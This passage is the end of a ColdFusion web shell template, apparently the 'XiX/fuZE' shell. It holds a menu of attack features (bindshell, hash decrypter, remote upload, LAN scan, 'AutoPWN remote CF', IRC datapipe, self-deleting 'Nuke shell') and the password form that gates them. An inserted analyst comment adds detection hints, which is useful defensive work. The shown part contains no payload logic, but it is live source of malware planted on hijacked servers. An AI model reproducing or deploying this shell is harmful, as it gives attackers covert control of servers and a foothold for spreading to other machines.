  954.         <div id='nav'><a href="#bind" name="modal">:: Bindshell ::</a></div>
  955.         <div id='nav'><a href="#decrypt" name="modal">:: CF hash decrypter ::</a></div>
  956.         <div id='nav'><a href="#upremote" name="modal">:: Upload files from remote server ::</a></div>
  957.         <div id='nav'><a href="#scanlan" name="modal">:: Scan LAN for CF ::</a></div>
  958.         <div id='nav'><a href="#autopwn" name="modal">:: AutoPWN remote CF ::</a></div>
  959.         <div id='nav'><a href="#irc" name="modal">:: IRC datapipe ::</a></div>
  960.         <div id='nav'><a href="#nuke" name="modal">:: Nuke shell ::</a></div>
  961.     </div>
  962. </div>
  963. </td></tr>
  964. </table>
  965. <div>
  966.     <cfset tickEnd = GetTickCount()>
  967.     <cfset loopTime = tickEnd - tickBegin>
  968.     <center><pre>XiX<blink>_</blink> | &fnof;uZE | <cfoutput>#loopTime#ms</cfoutput></pre></center>
  969.     </cfif>
  970. </div>
  971. <cfif IsUserLoggedIn() eq "No">
       <!--- Analyst note: this form is rendered only while IsUserLoggedIn() reports "No". It
             posts three fields named UserName, Password and LoginButton; no action attribute is
             set on the cfform. How the submitted values are checked is not visible in this part
             of the template (presumably against the UserName and Password values set in the
             config block at the top of the file; confirm there).
             Detection hint: the form name LoginForm together with these field names, and the
             credential values in the config block, are strings that can be matched when
             sweeping web roots or request logs for copies of this template. --->
  972.     <cfform name="LoginForm" method="post" format="html">
  973.         <center>
  974.         <table border="1" cellpadding="5" cellspacing="0">
  975.             <tr>
  976.                 <td colspan="2" align="center">
  977.                     <img src="<cfoutput>#icon#</cfoutput>">
  978.                 </td>
  979.             </tr>
  980.             <tr valign="top">
  981.                 <td>UserName</td>
  982.                 <td>
  983.                     <cfinput name="UserName" type="text" id="_color" style="background-color:666666; color:White; width:250px; height:25px;">
  984.                 </td>
  985.             </tr>
  986.             <tr valign="top">
  987.                 <td>Password</td>
  988.                 <td>
  989.                     <cfinput name="Password" type="password" style="background-color:666666; color:White; width:250px; height:25px;">
  990.                 </td>
  991.             </tr>
  992.             <tr valign="top">
  993.                 <td colspan="2" align="right">
  994.                     <cfinput class="_btn" type="submit" name="LoginButton" value="Login">
  995.                 </td>
  996.             </tr>
  997.         </table>
  998.         </center>
  999.     </cfform>
  1000. </cfif>
  1001.  
  1002. </body>
  1003.  
  1004. </html>